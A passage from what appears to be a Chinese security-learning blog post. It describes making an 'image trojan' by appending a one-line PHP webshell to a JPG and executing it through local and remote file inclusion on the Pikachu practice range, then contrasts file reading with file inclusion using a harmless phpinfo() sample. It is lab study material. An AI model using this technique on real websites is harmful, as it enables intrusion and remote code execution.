<p>查看yjhmm.jpg文件，发现能够正常查看</p>
<p><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250902201054178.png" alt="image-20250827164549738"></p>
<h3 id="使用010editor工具"><a href="#使用010editor工具" class="headerlink" title="使用010editor工具"></a>使用010editor工具</h3><p>使用010editor工具打开图片文件，然后在文件末尾添加一句话木马</p>
<p><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250902201059261.png" alt="image-20250827164015564"></p>
<p>2.png，也能够正常查看</p>
<p><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250902201107452.png" alt="2"></p>
<p>上传含有木马的图片文件，能够正常显示</p>
<p><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250902201111900.png" alt="image-20250827165046820"></p>
<p>首先将文件放在pikachu靶场的目录中</p>
<p><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250902201116829.png" alt="image-20250827173420645"></p>
<h2 id="在pikachu靶场使用本地文件包含"><a href="#在pikachu靶场使用本地文件包含" class="headerlink" title="在pikachu靶场使用本地文件包含"></a>在pikachu靶场使用本地文件包含</h2><p><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250902201121295.png" alt="image-20250827173345675"></p>
<h2 id="使用远程文件包含"><a href="#使用远程文件包含" class="headerlink" title="使用远程文件包含"></a>使用远程文件包含</h2><h3 id="要求"><a href="#要求" class="headerlink" title="要求"></a>要求</h3><p>在php的配置文件中打开 <code>allow_url_include = On</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250902201127861.png" alt="image-20250827184234067"></p>
<p>首先在另一台Windows10虚拟机开启phpstudy，然后将图片马复制到根目录下，然后使用pikachu靶场的远程文件包含</p>
<p><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250902201132015.png" alt="image-20250827180333041"></p>
<h1 id="4、演示文件包含和文件读取的区别"><a href="#4、演示文件包含和文件读取的区别" class="headerlink" title="4、演示文件包含和文件读取的区别"></a>4、演示文件包含和文件读取的区别</h1><h2 id="文件读取-1"><a href="#文件读取-1" class="headerlink" title="文件读取"></a>文件读取</h2><p>目的是获取文件的内容数据，通常作为字符串或二进制流来处理。程序不会主动执行这些内容。</p>
<h3 id="常用函数"><a href="#常用函数" class="headerlink" title="常用函数"></a>常用函数</h3><p><strong>PHP</strong>: <code>file_get_contents()</code>, <code>fread()</code>, <code>fopen()</code> + <code>fgets()</code></p>
<p><strong>Python</strong>: <code>open().read()</code></p>
<p><strong>Java</strong>: <code>FileInputStream</code>, <code>BufferedReader</code></p>
<p><strong>Node.js</strong>: <code>fs.readFile()</code></p>
<h3 id="以PHP语言的-fopen-函数为例"><a href="#以PHP语言的-fopen-函数为例" class="headerlink" title="以PHP语言的 fopen() 函数为例"></a>以PHP语言的 fopen() 函数为例</h3><p>首先写一个 txt 文件，内容是</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="title function_ invoke__">phpinfo</span>(); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250902201137667.png" alt="image-20250827191929272"></p>
<p>编写另一个php文件</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&lt;meta charset=&quot;utf-8&quot;&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">header(&#x27;Content-Type: text/html; charset=utf-8&#x27;);</span><br><span class="line"></span><br><span class="line">echo &quot;查看fopen_file.txt文件（未使用fgets）：&quot; . fopen(&quot;fopen_file.txt&quot;, &quot;r&quot;) . &quot;&lt;br&gt;&quot; . &quot;&lt;br&gt;&quot;;</span><br><span class="line"></span><br><span class="line">echo &quot;查看fopen_file.txt文件（使用fgets）：&quot; . fgets(fopen(&quot;fopen_file.txt&quot;, &quot;r&quot;)) . &quot;&lt;br&gt;&quot; . &quot;&lt;br&gt;&quot;;</span><br><span class="line"></span><br><span class="line">echo &quot;查看ceshi.php文件（未使用fgets）：&quot; . fopen(&quot;ceshi.php&quot;, &quot;r&quot;) . &quot;&lt;br&gt;&quot; . &quot;&lt;br&gt;&quot;;</span><br><span class="line"></span><br><span class="line">echo &quot;查看ceshi.php文件（使用fgets）：&quot; . fgets(fopen(&quot;ceshi.php&quot;, &quot;r&quot;)) . &quot;&lt;br&gt;&quot; . &quot;&lt;br&gt;&quot;;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>输出</p>
<p><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250902201145364.png" alt="image-20250827191944849"></p>
<p>文件读取是将文件中的内容当做数据来处理而不是当做代码来处理</p>
<h2 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h2><p>目的是将另一个文件的代码合并到当前文件中执行，是为了代码复用和模块化。</p>
<p>以pikachu靶场为例，在靶场中文件包含是将文件当做php代码来执行，当使用图片马时连jpg后缀的文件都被当做php文件执行然后执行了jpg文件中的PHP代码。</p>
<p><img src="https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250902201151387.png" alt="image-20250827180333041"></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">wickt42</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://example.com/2025/08/27/CSRF、SSRF、文件包含和文件读取/">http://example.com/2025/08/27/CSRF、SSRF、文件包含和文件读取/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/Web/">Web</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2025/08/28/%E8%B6%8A%E6%9D%83%E3%80%81%E4%BB%A3%E7%A0%81%EF%BC%88%E5%91%BD%E4%BB%A4%EF%BC%89%E6%89%A7%E8%A1%8C%E3%80%81JWT/"><i class="fa fa-chevron-left">  </i><span>越权、代码（命令）执行、JWT</span></a></div><div class="next-post pull-right"><a href="/2025/08/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E4%B8%8EWebShell%E7%AE%A1%E7%90%86/"><span>文件上传与WebShell管理</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://cdn.jsdelivr.net/gh/wickt42/PicGo.img@main/img/20250729164955479.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2013 - 2025 By wickt42</div><div class="framework-info"><span>Driven - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="footer_custom_text">hitokoto</div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/lib/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.1"></script><script src="/js/fancybox.js?version=1.9.1"></script><script src="/js/sidebar.js?version=1.9.1"></script><script src="/js/copy.js?version=1.9.1"></script><script src="/js/fireworks.js?version=1.9.1"></script><script src="/js/transition.js?version=1.9.1"></script><script src="/js/scroll.js?version=1.9.1"></script><script src="/js/head.js?version=1.9.1"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/tororo.model.json"},"display":{"superSample":2,"width":210,"height":420,"position":"left","hOffset":0,"vOffset":-20},"log":false,"tagMode":false});</script></body></html>